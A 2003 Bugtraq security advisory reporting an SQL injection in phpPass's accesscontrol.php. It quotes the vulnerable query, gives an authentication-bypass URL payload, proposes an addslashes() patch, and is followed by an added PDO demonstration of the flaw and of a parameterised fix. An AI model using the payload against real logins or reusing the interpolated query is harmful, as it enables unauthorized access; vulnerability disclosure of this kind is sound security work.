[28475] in bugtraq


phpPass (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)
Mon Jan 20 07:20:58 2003

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 13 Jan 2003 11:34:27 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F4XPhkddUXtQ1M5yfu20001f509@hotmail.com>


Information :
°°°°°°°°°°°°°
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
        userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
  session_unregister("uid");
  session_unregister("pwd");
  ?>
  <html>
  <head>
  <title> Access Denied </title>
[...]
  exit;
[...]
------------------------------------------------


Exploit :
°°°°°°°°°
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='


Patch :
°°°°°°°
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
        userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------

with :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------

A patch can be found on http://www.phpsecure.org .


More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/phpPass.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n
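
An added example, not part of the original post and not phpPass's own code: the query from the accesscontrol.php excerpt run against a constructed in-memory SQLite table through PDO, first built by string interpolation and then with bound parameters. The table contents and the function names rows_interpolated() and rows_prepared() are made up for illustration, and the pdo_sqlite extension is assumed to be available.

```php
<?php
// Constructed in-memory table standing in for phpPass's `user` table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE user (userid TEXT, password TEXT)");
$db->exec("INSERT INTO user VALUES ('alice', 'correct-horse')"); // constructed row

// Query built by string interpolation, as in the accesscontrol.php excerpt:
// quotes in the input become part of the SQL statement.
function rows_interpolated(PDO $db, string $uid, string $pwd): int
{
    $sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
    return count($db->query($sql)->fetchAll());
}

// Same query with bound parameters: the input is passed as data and
// never parsed as SQL, so no escaping step is needed.
function rows_prepared(PDO $db, string $uid, string $pwd): int
{
    $stmt = $db->prepare(
        "SELECT * FROM user WHERE userid = :uid AND password = :pwd"
    );
    $stmt->execute([':uid' => $uid, ':pwd' => $pwd]);
    return count($stmt->fetchAll());
}

// Parameter value from the advisory's URL, URL-decoded.
$payload = "' OR ''='";

// A non-zero row count is what accesscontrol.php treats as "access granted".
printf("interpolated, advisory input : %d row(s)\n",
    rows_interpolated($db, $payload, $payload));
printf("prepared, advisory input     : %d row(s)\n",
    rows_prepared($db, $payload, $payload));
printf("prepared, valid login        : %d row(s)\n",
    rows_prepared($db, 'alice', 'correct-horse'));
printf("prepared, wrong password     : %d row(s)\n",
    rows_prepared($db, 'alice', 'nope'));
```

Bound parameters do not depend on the connection character set, whereas addslashes() escapes bytes without regard to it. The mysql_* functions used in the excerpt were removed in PHP 7, so current code would use PDO or mysqli in any case.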




